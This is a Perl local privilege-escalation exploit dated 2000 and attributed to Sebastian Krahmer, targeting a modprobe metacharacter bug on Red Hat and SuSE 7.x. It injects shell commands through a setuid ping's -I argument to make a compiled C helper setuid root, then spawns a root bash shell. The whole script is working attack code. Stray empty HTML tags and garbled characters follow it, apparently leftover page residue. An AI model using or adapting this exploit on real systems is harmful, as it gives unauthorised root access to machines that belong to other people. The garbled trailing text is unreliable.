#!/usr/bin/perl # RH 7.x, SuSE 7.x local root. Probably others. # Bugdiscovery by me. First exploit (guess who) # by lcamtuf. In fact my code is rather a port of his shellscript. # His 'without /' hack is great. # # (C) 2000 by Sebastian Krahmer. You are not allowed # to trade this. All rights reserved, all wrongs reversed. # Use at your own risk. printf("\n\nSo. Introducing new world smashing exploit.\n". "modprobe shell metacharacter expansion bug.\n". "Discovery by me (Stealth). \n". "Greets to all my friends; you know who you are.\n". "Special thanks to \033[32m Michal Zalewski\033[0m for pointing me to ping :P\n". "and to \033[32mSolar Designer\033[0m for taking the time to discuss\n". "'capability expansion bug'. Please Update to your distributors\n". "newest modutil package and dont do anything bad.\n\n". "return to continue, Ctrl-C to abort\n\n"); <>; $ping = `which ping`; chop $ping; print("Now, doing some magic ...\n". "(please wait while doing so, we just have modprobe-wishes)\n\n"); if ((stat($ping6))[2] & 04000) { $ping = $ping6; } else { if ((stat($ping))[2] & 04000 != 04000) { print "Need some suid helper\n"; exit; } } system("$ping -I ';chmod o+w .' 1.2.3.4"); open O, ">/xp.c" or die "Seems to be fixed: $!"; print O<<_EOF_; int main() { setuid(0); setgid(0); system("/bin/bash;rm -f /xp /xp.c;chmod 0755 /"); return 0; } _EOF_ close O; system("cc /xp.c -o /xp"); system("$ping -I ';chown 0.0 xp' 1.2.3.4"); system("$ping -I ';chmod +s xp' 1.2.3.4"); print "Voila!\n\n"; system("/xp");
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß